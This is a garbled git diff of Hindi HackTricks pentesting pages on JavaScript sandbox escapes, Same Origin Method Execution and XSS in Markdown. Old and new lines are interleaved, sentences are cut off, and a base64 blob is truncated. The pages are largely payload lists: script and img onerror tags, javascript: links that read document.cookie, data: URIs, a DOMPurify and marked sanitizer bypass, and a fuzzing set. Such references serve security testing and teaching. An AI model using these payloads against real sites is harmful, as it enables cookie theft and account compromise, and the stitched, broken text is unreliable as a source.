(u=>_=>(String(u)))(_=>{ /* Hidden commment */ })()
```
## सैंडबॉक्स छूट - विंडो ऑब्जेक्ट की पुनर्प्राप्ति
विंडो ऑब्जेक्ट को अलर्ट या इवैल जैसे वैश्विक रूप से परिभाषित फंक्शन तक पहुंचने की अनुमति देता है।
{% code overflow="wrap" %}
## सैंडबॉक्स एस्केप - विंडो ऑब्ज
```javascript
// Some ways to access window
window.eval("alert(1)")
@ -423,7 +360,7 @@ with(element) {
```
{% endcode %}
## मान तक पहुंच पर ब्रेकपॉइंट
## मान तक पहुंचने पर ब्रेकपॉइंट
```javascript
// Stop when a property in sessionStorage or localStorage is set/get
// via getItem or setItem functions
@ -464,36 +401,7 @@ origValue = val;
debugAccess(Object.prototype, 'ppmap')
```
## परीक्षण पेलोड के लिए स्वचालित ब्राउज़र एक्सेस
यह तकनीक आपको अपने परीक्षण पेलोड को स्वचालित रूप से ब्राउज़र में एक्सेस करने में मदद करेगी। इसके लिए आपको निम्नलिखित कदमों का पालन करना होगा:
1. एक नया HTML फ़ाइल बनाएं और उसे अपने वेब सर्वर पर होस्ट करें।
2. फ़ाइल में निम्नलिखित कोड जोड़ें:
```html
<script>
// यहां अपना परीक्षण पेलोड डालें
var payload = "<script>alert('XSS');</script>";
// ब्राउज़र एक्सेस के लिए नया विंडो खोलें
var win = window.open("", "_blank");
// विंडो के अंदर HTML डॉक्यूमेंट बनाएं
var doc = win.document.open();
// डॉक्यूमेंट में पेलोड लोड करें
doc.write(payload);
// डॉक्यूमेंट को बंद करें
doc.close();
</script>
```
3. अपने ब्राउज़र में नया टैब खोलें और नया URL दर्ज करें: `http://आपका_वेब_सर्वर/आपकी_फ़ाइल.html`
4. जब आप यह URL खोलेंगे, तो एक नया विंडो खुलेगा और आपका परीक्षण पेलोड उसमें लोड होगा। यदि आपका पेलोड कार्यान्वित होता है, तो एक अलर्ट दिखाई देगा।
इस तकनीक का उपयोग करके आप अपने परीक्षण पेलोड को स्वचालित रूप से ब्राउज़र में एक्सेस कर सकते हैं और XSS के लिए सुरक्षा जांच सकते हैं।
## स्वचालित ब्राउज़र एक्सेस पेयलोड की जांच के लिए
```javascript
//Taken from https://github.com/svennergr/writeups/blob/master/inti/0621/README.md
const puppeteer = require("puppeteer");
@ -537,10 +445,10 @@ await browser.close();
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप किसी **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी को HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS की नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग** करने की इच्छा है? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFT संग्रह**](https://opensea.io/collection/the-peass-family)
* [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में या मुझे **Twitter** पर **फ़ॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **अपने हैकिंग ट्रिक्स को** [**hacktricks रेपो**](https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud रेपो**](https://github.com/carlospolop/hacktricks-cloud) **में PR जमा करके साझा करें**
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण देखना चाहते हैं या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) की जाँच करें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह।
* [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में या **मुझे** **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)** पर** **फॉलो** करें।
* **हैकिंग ट्रिक्स साझा करें और PRs सबमिट करके** [**hacktricks रेपो**](https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud रेपो**](https://github.com/carlospolop/hacktricks-cloud)।
</details>

View file

@ -1,34 +1,30 @@
# SOME - Same Origin Method Execution
# कुछ - समान मूल स्थान विधि निष्पादन
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ हैकट्रिक्स क्लाउड ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 ट्विटर 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ ट्विच 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 यूट्यूब 🎥</strong></a></summary>
* क्या आप किसी **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी कंपनी को **HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS की नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग** करना चाहिए? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFT**](https://opensea.io/collection/the-peass-family) संग्रह देखें
* [**आधिकारिक PEASS और HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें
* [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में **शामिल हों** या मुझे **Twitter** पर **फ़ॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **हैकिंग ट्रिक्स साझा करें और** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **में PR जमा करके**.
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप चाहते हैं कि आपकी **कंपनी हैकट्रिक्स में विज्ञापित हो**? या क्या आप **PEASS के नवीनतम संस्करण देखना चाहते हैं या हैकट्रिक्स को पीडीएफ में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जाँच करें!
* [**द पीएस फैमिली**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**एनएफटी**](https://opensea.io/collection/the-peass-family) संग्रह।
* [**आधिकारिक पीएस और हैकट्रिक्स स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मेरा** **ट्विटर** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)** का** **पालन** करें।
* **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**हैकट्रिक्स रेपो**](https://github.com/carlospolop/hacktricks) **और** [**हैकट्रिक्स-क्लाउड रेपो**](https://github.com/carlospolop/hacktricks-cloud)।
</details>
## Same Origin Method Execution
## समान मूल स्थान विधि निष्पादन
कभी-कभी ऐसे मौके होते हैं जहां आप किसी पेज में कुछ सीमित जावास्क्रिप्ट को निष्पादित कर सकते हैं। उदाहरण के लिए, ऐसे मामले में जहां आप [**किसी कॉलबैक मान को निष्पादित करने का नियंत्रण**](./#javascript-function) कर सकते हैं
कभी-कभी ऐसे मौके होते हैं जहां आप पेज में कुछ सीमित जावास्क्रिप्ट को निष्पादित कर सकते हैं। उदाहरण के लिए, उस स्थिति में जहां आप [**कंट्रोल कर सकते हैं एक कॉलबैक मान जो निष्पादित किया जाएगा**](./#javascript-function)
ऐसे मामलों में, आपका सबसे अच्छा काम होगा कि आप **DOM तक पहुंचें और वहां के किसी भी संवेदनशील कार्रवाई को कॉल करें** (जैसे कि बटन पर क्लिक करना)। हालांकि, आमतौर पर आपको इस सुरक्षा दुरुपयोग को **DOM में किसी रोचक चीज के बिना छोटे अंतबिंदुओं में पाएंगे**।
उन मामलों में, आपका करने का सबसे अच्छा काम है **DOM तक पहुंचना और वहां कोई भी** संवेदनशील कार्रवाई करना जिसे आप वहां पा सकते हैं (जैसे कि एक बटन पर क्लिक करना)। हालांकि, आम तौर पर आपको यह दोषपूर्णता **छोटे एंडपॉइंट्स में ही मिलेगी जिनमें DOM में कोई दिलचस्प चीज नहीं होगी**।
ऐसे स्थितियों में, यह हमला बहुत उपयोगी होगा, क्योंकि इसका उद्देश्य है कि आप **एक ही डोमेन के अलग पेज से DOM के भीतर सीमित JS निष्पादन का दुरुपयोग कर सकें** और बहुत सारी रोचक कार्रवाइयों को कर सकें
उन स्थितियों में, यह हमला बहुत उपयोगी होगा, क्योंकि इसका लक्ष्य है कि आप **एक DOM में सीमित JS निष्पादन का दुरुपयोग कर सकें जो एक ही डोम के अलग पेज से** बहुत दिलचस्प कार्रवाई कर सकता है
मूल रूप से, हमले का फ्लो निम्न है:
मूल रूप से, हमले की फ्लो निम्नलिखित है:
* एक **कॉलबैक ढूंढें जिसे आप दुरुपयोग कर सकते हैं** (संभावित रूप से \[\w\\.\_] तक सीमित)
* यदि यह सीमित नहीं है और आप कोई भी JS निष्पादित कर सकते हैं, तो आप इसे एक साधारण XSS के रूप में दुरुपयोग कर सकते हैं
* **पीड़ित व्यक्ति को एक पेज खोलने** के लिए उपयोग करें जिसे **हमलावर नियंत्रण** करता है
* **पेज खुद को खोलें** एक **अलग विंडो में** (नई विंडो में ऑब्जेक्ट **`opener`** को मूल वाले को संदर्भित करेगा)
* **मूल पेज** वहां स्थित **पेज** लोड करेगा जहां **रोचक DOM** स्थित है।
* **दूसरा पेज** **कॉलबैक का दुरुपयोग करते हुए विकल्पशील पेज लोड करेगा** और **`opener`** ऑब्जेक्ट का उपयोग करेगा **मूल पेज में कुछ कार्रवाई तक पहुंचने और निष्पादित करने के लिए** (जो अब रोचक DOM को सम्मिलित करता है)।
{% hint style="danger" %}
ध्यान दें कि यदि मूल पेज दूसरे पेज को बनाने के बाद नए URL में पहुंचता है, तो दूसरे पेज का **`opener` ऑब्जेक्ट नए DOM में
</details>
* **एक कॉलबैक खोजें जिसे आप दुरुपयोग कर सकते हैं** (संभावित रूप से \[\w\\.\_] तक सीमित)।
* यदि यह सीमित नहीं है और आप किसी भी JS को निष्पादित कर सकते हैं, तो आप इसे एक साधारण XSS के रूप में दुरुपयोग कर सकते हैं।
* **विक्टिम से कहें कि एक पेज खोलें** जिसे **हमलावर नियंत्रित करता है**
* **पेज खुद को खोलेगा** एक **अलग विंडो में** (नया विंडो में ऑब्जेक्ट **`opener`** प्रारंभिक वाले को संदर्भित करेगा)
* **प्रारंभिक पेज** वह **पेज** लोड करेगा जहां **दिलचस्प DOM** स्थित है।
* **दूसरा पेज** **कॉलबैक का दुरुपयोग करते हुए दुरुपयोग करने वाला पेज लोड करेगा** और **`opener`** ऑब्ज

View file

@ -4,29 +4,29 @@
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी कंपनी को **HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग** करने की इच्छा है? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें!
* खोजें [**The PEASS Family**](https://opensea.io/collection/the-peass-family), हमारा विशेष संग्रह [**NFTs**](https://opensea.io/collection/the-peass-family)
* प्राप्त करें [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **फॉलो** करें मुझे **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **अपने हैकिंग ट्रिक्स साझा करें, [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud)** को PR जमा करके।
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) की जाँच करें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह।
* [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें।
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या मुझे **Twitter** पर **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **अपने हैकिंग ट्रिक्स साझा करें, [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud)** को PRs जमा करके।
</details>
यदि आपको मार्कडाउन में कोड संशोधित करने का मौका मिलता है, तो आप कुछ विकल्प उपयोग कर सकते हैं जिससे कोड को व्याख्या किए जाने पर XSS को ट्रिगर किया जा सकता है
यदि आपको मार्कडाउन में कोड इंजेक्शन का मौका मिलता है, तो कोड को अनुप्रेषित होने पर XSS को ट्रिगर करने के लिए आप कुछ विकल्प प्रयोग कर सकते हैं
### HTML टैग
मार्कडाउन में XSS प्राप्त करने का सबसे सामान्य तरीका है सामान्य HTML टैग्स को संशोधित करना जो जावास्क्रिप्ट को निष्पादित करते हैं, क्योंकि कई मार्कडाउन व्याख्याकर्ता HTML को भी स्वीकार करेंगे।
मार्कडाउन में XSS प्राप्त करने का सबसे सामान्य तरीका सामान्य HTML टैग इंजेक्ट करना है जो जावास्क्रिप्ट को क्रियान्वित करते हैं, क्योंकि कई मार्कडाउन इंटरप्रीटर्स भी HTML को स्वीकार करेंगे।
```html
<!-- XSS with regular tags -->
<script>alert(1)</script>
<img src=x onerror=alert(1) />
```
आप [hacktricks](./) के मुख्य XSS पेज में और उदाहरण ढूंढ सकते हैं।
आप [hacktricks के मुख्य XSS पृष्ठ](./) में अधिक उदाहरण पा सकते हैं।
### जावास्क्रिप्ट लिंक
यदि HTML टैग विकल्प नहीं हैं तो आप हमेशा मार्कडाउन सिंटेक्स के साथ खेलने की कोशिश कर सकते हैं:
यदि HTML टैग एक विकल्प नहीं हैं तो आप हमेशा मार्कडाउन सिंटेक्स के साथ खेलने की कोशिश कर सकते हैं:
```html
<!-- markdow link to XSS, this usually always work but it requires interaction -->
[a](javascript:prompt(document.cookie))
@ -41,45 +41,18 @@
[a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)
[a](javascript:window.onerror=alert;throw%201)
```
### इमेज इवेंट सिंटेक्स का दुरुपयोग
The `img` tag in HTML allows us to display images on a webpage. However, it can also be abused to execute malicious code if proper input validation and sanitization are not implemented.
एचटीएमएल में `img` टैग हमें वेबपेज पर छवियाँ प्रदर्शित करने की अनुमति देता है। हालांकि, यदि सही इनपुट मान्यता और सेनिटाइज़ेशन नहीं की जाती है, तो यह दुर्भाग्यपूर्ण कोड को निष्पादित करने के लिए दुरुपयोग किया जा सकता है।
The `img` tag has an `onerror` event attribute that is triggered when the image fails to load. This attribute can be exploited to execute arbitrary JavaScript code.
`img` टैग में `onerror` घटना गुणांक होता है जब छवि लोड नहीं हो पाती है। इस गुणांक का दुरुपयोग करके विचित्र जावास्क्रिप्ट कोड को निष्पादित किया जा सकता है।
To exploit this, an attacker can inject JavaScript code into the `src` attribute of the `img` tag and use the `onerror` event to execute the injected code.
इसे शोषण करने के लिए, हमलावर एक जावास्क्रिप्ट कोड को `img` टैग के `src` गुणांक में संप्रेषित कर सकता है और `onerror` घटना का उपयोग करके संप्रेषित कोड को निष्पादित कर सकता है।
For example, the following code snippet demonstrates an XSS attack using the `onerror` event:
उदाहरण के लिए, निम्नलिखित कोड टुकड़ा `onerror` घटना का उपयोग करके एक XSS हमला दिखाता है:
```html
<img src="nonexistent-image.jpg" onerror="alert('XSS Attack!');" />
```
When the image fails to load, the `onerror` event is triggered, executing the JavaScript code `alert('XSS Attack!');`. This code will display an alert box with the message "XSS Attack!".
जब छवि लोड नहीं हो पाती है, तो `onerror` घटना ट्रिगर होती है और जावास्क्रिप्ट कोड `alert('XSS Attack!');` को निष्पादित करती है। यह कोड "XSS हमला!" संदेश के साथ एक चेतावनी बॉक्स प्रदर्शित करेगा।
To prevent this type of attack, it is important to properly validate and sanitize user input, especially when it is used to construct dynamic HTML content.
इस प्रकार के हमले से बचने के लिए, उपयोगकर्ता इनपुट की सही मान्यता और सेनिटाइज़ेशन करना महत्वपूर्ण है, खासकर जब यह डायनामिक एचटीएमएल सामग्री का निर्माण करने के लिए उपयोग किया जाता है।
### Img घटना विधि दुरुपयोग
```markdown
![Uh oh...]("onerror="alert('XSS'))
![Uh oh...](https://www.example.com/image.png"onload="alert('XSS'))
![Escape SRC - onload](https://www.example.com/image.png"onload="alert('ImageOnLoad'))
![Escape SRC - onerror]("onerror="alert('ImageOnError'))
```
### HTML सैनिटाइजर मार्कडाउन बाइपास
### HTML सेनिटाइज़र मार्कडाउन बायपास
निम्नलिखित कोड **HTML इनपुट को सैनिटाइज** कर रहा है और फिर इसे **मार्कडाउन पार्सर को पास कर रहा है**, इसके बाद, XSS को Markdown और DOMPurify के बीच गलत-समझ के द्वारा ट्रिगर किया जा सकता है।
निम्नलिखित कोड **HTML इनपुट को सेनिटाइज़ कर रहा है** और फिर **इसे मार्कडाउन पार्सर को पारित कर रहा है**, इसके बाद, XSS को Markdown और DOMPurify के बीच के गलत-समझ का शिकार करके ट्रिगर किया जा सकता है।
```html
<!--from https://infosecwriteups.com/clique-writeup-%C3%A5ngstromctf-2022-e7ae871eaa0e -->
<script src="https://cdn.jsdelivr.net/npm/dompurify@2.3.6/dist/purify.min.js"></script>
<script src="https://cdn.jsdelivr.net/npm/marked@4.0.14/lib/marked.umd.min.js"></script>
<script>
@ -106,8 +79,6 @@ document.body.innerHTML = marked.parse(DOMPurify.sanitize(qs.get("content")));
`<p x="`<img src=x onerror=alert(1)>"></p>
```
### फज़िंग
फज़िंग एक अभ्यास है जिसमें आप अनुप्रयोगों को अनुकरण करने के लिए असंभावित या अनुप्रयोगित मानचित्रों का उपयोग करते हैं। यह एक प्रभावी तकनीक है जो आपको अनुप्रयोगों में संभावित सुरक्षा दुरुपयोगों की खोज करने में मदद कर सकती है। फज़िंग का उपयोग करके, आप अनुप्रयोगों के विभिन्न भागों को अद्यतित करने और उनमें असंभावित या अनुप्रयोगित इनपुट द्वारा उत्पन्न होने वाली संभावित सुरक्षा दुरुपयोगों को खोजने के लिए विभिन्न प्रकार के इनपुट डेटा का उपयोग कर सकते हैं। यह आपको अनुप्रयोगों की सुरक्षा को मजबूत करने और संभावित दुरुपयोगों को पहचानने में मदद कर सकता है।
```html
<!--
Fuzzing examples from
@ -132,7 +103,7 @@ Fuzzing examples from
[notmalicious](javascript://%0d%0awindow.onerror=alert;throw%20document.cookie)
[a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)
[clickme](vbscript:alert(document.domain))
_http://danlec_@.1 style=background-image:url(data:image/png;base64,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);background-repeat:no-repeat;display:block;width:100%;height:100px; onclick=alert(unescape(/ओह%20नहीं!/.source));return(false);//
_http://danlec_@.1 style=background-image:url(data:image/png;base64,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